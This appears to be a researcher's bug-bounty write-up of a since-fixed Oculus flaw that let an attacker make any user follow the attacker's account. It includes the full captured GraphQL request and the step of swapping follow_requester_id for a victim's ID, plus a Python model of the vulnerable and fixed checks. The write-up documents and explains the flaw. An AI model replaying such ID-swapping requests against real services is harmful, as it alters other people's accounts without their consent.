Meta Quest: Attacker could make any Oculus user follow (subscribe to) him without any approval

Description

An attacker was able to subscribe any Oculus user to the attacker's Oculus account without that user's approval. So it was possible to build a very attractive account with a lot of real followers who never agreed to follow it :). These followers are displayed on the Oculus Quest device when you open the user's profile, in the profile opened in Meta Quest for Android, and in some other places.

Bug details

This page https://secure.oculus.com/my/people/ displays an Oculus user's followers:

If the user (attacker) has enabled confirmation for follow requests, then every time somebody wants to follow him, the user has to confirm this action (see screenshot).

When the user presses "confirm", the following request is executed:

POST /graphql?locale=en_US HTTP/2
Host: graph.oculus.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://secure.oculus.com/
Content-Type: application/x-www-form-urlencoded
X-Fb-Friendly-Name: OCAccountFollowRequestButtonsAcceptMutation
Content-Length: 1149
Origin: https://secure.oculus.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
access_token=[oculus_token]&__user=0&__a=1&__dyn=7xxxxxxx&__csr=&__req=b&__hs=19319.BP%3ADEFAULT.2.0.0.0.0&dpr=1&__ccg=UNKNOWN&__rev=1006635818&__s=0r9wew%3Ahv568o%3A8ypvmx&__hsi=7169288311854648182&__comet_req=0&fb_dtsg=NAcPG2AAd4G6m4szOMQvjzA16I2JKXs2PpV0Zpo9_y87xy-YjAtUBXQ%3A25%3A1669198279&jazoest=25286&lsd=9-B9N5_yEmkNxprj42tPAh&__jssesw=1&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=OCAccountFollowRequestButtonsAcceptMutation&variables=%7B%22follow_requester_id%22%3A%22109035146728215%22%2C%22add_connections%22%3A%5B%22client%3A10487732912XXXX%3A__OCAccountFollowerList_followers_connection(orderby%3A%5C%22NAME_OR_ALIAS%5C%22)%22%5D%2C%22remove_connections%22%3A%5B%22client%3A10487732912XXXX%3A__OCAccountFollowRequestList_follower_requests_received_connection(orderby%3A%5C%22NAME_OR_ALIAS%5C%22)%22%5D%7D&server_timestamps=true&doc_id=5253592544678660


Here "follow_requester_id%22%3A%22109035146728YYY" is the parameter carrying the Oculus ID of the account that wants to follow the user (your account). Now replace "109035146728YYY" with any other valid Oculus ID "XXXXX" and execute the request.

User "XXXXX" will be subscribed to your account (will follow you without any approval from "XXXXX"'s side). The server trusted the client-supplied follow_requester_id and never checked that a pending follow request from that ID to the authenticated account actually existed.
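To make the missing authorization check concrete, here is an added illustration (not Meta's or Oculus's code) that models the accept mutation's server-side logic: the vulnerable variant adds whatever follow_requester_id the client sends, while the fixed variant only accepts an ID that has a pending request addressed to the authenticated account. The FollowGraph class, the account names and the demo scenario are all constructed for this example.

```python
# Added illustration (not Oculus/Meta code): an in-memory model of the
# "accept follow request" mutation, vulnerable and fixed side by side.
# All account IDs below ("A", "R", "V") are constructed sample data.

class FollowGraph:
    def __init__(self):
        # pending[target] = set of requester ids awaiting target's approval
        self.pending = {}
        # followers[target] = set of accounts that follow target
        self.followers = {}

    def send_follow_request(self, requester, target):
        self.pending.setdefault(target, set()).add(requester)

    def accept_vulnerable(self, authed_user, follow_requester_id):
        """Mirrors the reported bug: only checks that the caller is logged
        in, then adds whatever ID the client sent as a follower."""
        self.followers.setdefault(authed_user, set()).add(follow_requester_id)
        self.pending.get(authed_user, set()).discard(follow_requester_id)
        return True

    def accept_fixed(self, authed_user, follow_requester_id):
        """Authorization check: a request can only be accepted if that
        requester actually asked to follow the authenticated user."""
        if follow_requester_id not in self.pending.get(authed_user, set()):
            return False  # reject: no such pending request, nothing changes
        self.pending[authed_user].discard(follow_requester_id)
        self.followers.setdefault(authed_user, set()).add(follow_requester_id)
        return True

    def is_follower(self, follower, target):
        return follower in self.followers.get(target, set())


def demo():
    """Replays the scenario: attacker 'A' accepts a request that victim 'V'
    never sent. Returns (victim_follows_on_vulnerable, victim_follows_on_fixed)."""
    g_vuln, g_fixed = FollowGraph(), FollowGraph()
    # only 'R' legitimately asked to follow 'A'; 'V' never did
    for g in (g_vuln, g_fixed):
        g.send_follow_request("R", "A")
    g_vuln.accept_vulnerable("A", "V")   # succeeds: V now "follows" A
    g_fixed.accept_fixed("A", "V")       # rejected: no pending request from V
    return g_vuln.is_follower("V", "A"), g_fixed.is_follower("V", "A")


if __name__ == "__main__":
    print(demo())  # (True, False)
```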

Timeline

23.11.2022: me: bug submitted as an issue found in the People app on the Oculus Quest device (I didn't know the HTTP request for this yet, but it worked via the People app bug)

23.11.2022: me: found the vulnerable request via the https://secure.oculus.com/my/people/ page and submitted more details

24.11.2022: fb: triaged

26.11.2022: fb: reward $863 (750 + 113 bonus)

26.11.2022: me: asked to explain reward amount 

30.11.2022: me: payment dispute

07.12.2022: fb: fixed

14.12.2022: fb: additional reward $863 (750 + 113 bonus) - total reward $1500 + $226 bonus

However, I expected that this issue would have more impact than it was rewarded for :), but ok.
